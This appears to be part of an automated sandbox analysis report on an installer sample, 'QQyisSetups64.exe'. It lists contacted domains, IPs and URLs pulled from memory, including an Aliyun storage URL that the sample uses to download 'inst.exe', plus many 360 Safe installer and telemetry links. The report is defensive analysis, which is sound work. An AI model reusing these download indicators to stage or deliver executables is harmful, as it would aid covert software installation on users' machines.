http://wpad.%s/wpad.dathttp://%s/wpad.datwpad	0%	Avira URL Cloud	safe
http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab	0%	Avira URL Cloud	safe
http://pinst.360.cn/360safe/h_inst.cabrd=107882641K:	0%	Avira URL Cloud	safe
https://bbs.360.cn/thread-16079507-1-1.html	0%	Avira URL Cloud	safe
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe	0%	Avira URL Cloud	safe
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exea	0%	Avira URL Cloud	safe
http://pinst.360.cn/360safe/h_inst.cab	0%	Avira URL Cloud	safe
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep	0%	Avira URL Cloud	safe
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeq	0%	Avira URL Cloud	safe
http://sfdw.360safe.com/safesetup_2000.exe360	0%	Avira URL Cloud	safe
https://bbs.360.cn/thread-16079507-1-1.htmlD	0%	Avira URL Cloud	safe
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/	0%	Avira URL Cloud	safe
http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh	0%	Avira URL Cloud	safe
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264FK	0%	Avira URL Cloud	safe
http://sfdw.360safe.com/superkiller/superkillerexe_ce61817f687d599de13ee9deb1af83e2_5.1.0.1181.cab	0%	Avira URL Cloud	safe
http://%s/%u%u.html	0%	Avira URL Cloud	safe
http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA	0%	Avira URL Cloud	safe
http://pinst.360.cn/360se/wssj_setup.cab	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
tr.p.360.cn	1.192.136.134	true	false	high
agt.p.360.cn	1.192.136.133	true	false	high
agd2.p.360.cn	1.192.194.215	true	false	high
bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com	47.79.48.211	true	false	unknown
s.360.cn	171.8.167.90	true	false	high
seupdate.360qhcdn.com	39.156.85.200	true	false	high
st.p.360.cn	1.192.136.170	true	false	high
agd.p.360.cn	unknown	unknown	false	high
pinst.360.cn	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0	false		high
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe	false	Avira URL Cloud: safe	unknown
http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe	inst.exe, 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmp, inst.exe, 0000000F.00000000.1438674426.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460442759.0000000000B58000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445103284.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.dr	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	QQyisSetups64.exe, QQyisSetups64.exe.3.dr	false		high
http://pinst.360.cn/zhuomian/desktopsafe.cab	inst.exe, inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 0000000D.00000002.1402669739.00000000033A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10	inst.exe	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safef	inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.0000000002913000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/l	QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microqz	powershell.exe, 0000000C.00000002.1436414735.000000000845E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hao.360.cn/?installer	inst.exe	false		high
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264XXQ	inst.exe, 0000000F.00000002.2576022298.0000000003F08000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefin	inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hao.360.cn	inst.exe	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://%s/%s.trt	inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	false	Avira URL Cloud: safe	unknown
http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safef	inst.exe, 0000000F.00000002.2559394305.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wpad.%s/wpad.dat	inst.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D47000.00000004.00000800.00020000.00000000.sdmp	false		high
http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab	inst.exe	false	Avira URL Cloud: safe	unknown
http://down.360safe.com/setupbeta.exe	inst.exe	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264Hl	inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	360P2SP.dll.15.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/wpad.dat	inst.exe	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 0000000C.00000002.1427177445.0000000005363000.00000004.00000800.00020000.00000000.sdmp	false		high
http://hao.360.com	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false		high
https://contoso.com/Icon	powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000012.00000002.2576153550.000002945F200000.00000004.00000020.00020000.00000000.sdmp	false		high
http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab	inst.exe, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d	inst.exe	false		high
http://www.symauth.com/cps0(	inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/gf/360ini.cab	inst.exe	false	Avira URL Cloud: safe	unknown
http://down.360safe.com/setup.exePathSOFTWARE	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.dr	false		high
http://wpad.%s/wpad.dathttp://%s/wpad.datwpad	inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	false	Avira URL Cloud: safe	unknown
https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false		high
https://g.live.com/odclientsettings/Prod1C:	qmgr.db.18.dr	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefin	inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1533920373.0000000003891000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bbs.360.cn/thread-16079507-1-1.html	inst.exe	false	Avira URL Cloud: safe	unknown
https://hao.360.cn/	inst.exe	false		high
http://www.symauth.com/rpa00	inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000C.00000002.1427177445.0000000005214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pinst.360.cn/360safe/h_inst.cabrd=107882641K:	inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://down.360safe.com/h11=	inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	false		high
http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false		high
http://www.360.cn	inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	false		high
http://123.com/	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false		high
https://www.incredibuild.com	QQyisSetups64.exe, QQyisSetups64.exe.3.dr	false		high
http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
http://down.360safe.com/setup.exe	inst.exe	false		high
http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false		high
http://ocsp.sectigo.com0	QQyisSetups64.exe, QQyisSetups64.exe.3.dr	false		high
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264HTTP:XX-	inst.exe, 0000000F.00000002.2575396513.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sfdw.360safe.com/setup.exe.exe	inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	false		high
http://www.360.cn/	inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	false		high
http://down.360safe.com/setup.exehttp://d	inst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefi	inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	QQyisSetups64.exe, QQyisSetups64.exe.3.dr	false		high
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exea	QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safef	inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safef	inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefi	inst.exe, 0000000F.00000003.1534492876.000000000293F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pinst.360.cn/360safe/h_inst.cab	inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeq	QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep	QQyisSetups64.exe, 00000003.00000002.1456312362.000000000019A000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1456369398.0000000000400000.00000040.00000001.01000000.00000004.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000006.00000002.2556409168.000000000019D000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sfdw.360safe.com/safesetup_2000.exe360	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/	QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbs.360.cn/thread-16079507-1-1.htmlD	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264FK	inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safef	inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573466841.0000000002936000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh	inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
http://sfdw.360safe.com/superkiller/superkillerexe_ce61817f687d599de13ee9deb1af83e2_5.1.0.1181.cab	inst.exe	false	Avira URL Cloud: safe	unknown
http://p.s.360.cn/p2p/p2sp_uplog.php	inst.exe	false		high
http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safef	inst.exe, 0000000F.00000002.2559394305.000000000081F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.360.cn//index.html127.0.0.1--	inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	QQyisSetups64.exe, QQyisSetups64.exe.3.dr	false		high
http://down.360safe.com/360safe/slideshow_new.cab	inst.exe, 0000000F.00000002.2574938376.00000000038AA000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1561420141.0000000008300000.00000004.00000800.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2556312311.0000000000396000.00000004.00000010.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573466841.000000000294F000.00000004.00000020.00020000.00000000.sdmp, setup.ini.15.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	QQyisSetups64.exe, QQyisSetups64.exe.3.dr	false		high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000012.00000003.1512607145.000002945EFB0000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.dr	false		high
http://dl.360safe.com/setup_13.0.0.2008k.exe	inst.exe, 0000000F.00000002.2574938376.00000000038AA000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1561420141.0000000008300000.00000004.00000800.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2556312311.0000000000396000.00000004.00000010.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp, setup.ini.15.dr	false		high
http://%s/%u%u.html	inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	false	Avira URL Cloud: safe	unknown
http://pinst.360.cn/360se/wssj_setup.cab	inst.exe, inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown
http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA	inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
39.156.85.201	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
171.8.167.90	s.360.cn	China	137687	CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	false
39.156.85.200	seupdate.360qhcdn.com	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
1.192.136.135	unknown	China	137687	CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	false
39.156.85.231	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
1.192.136.171	unknown	China	137687	CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	false
8.46.123.189	unknown	United States	62713	AS-PUBMATICUS	false
1.192.136.134	tr.p.360.cn	China	137687	CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	false
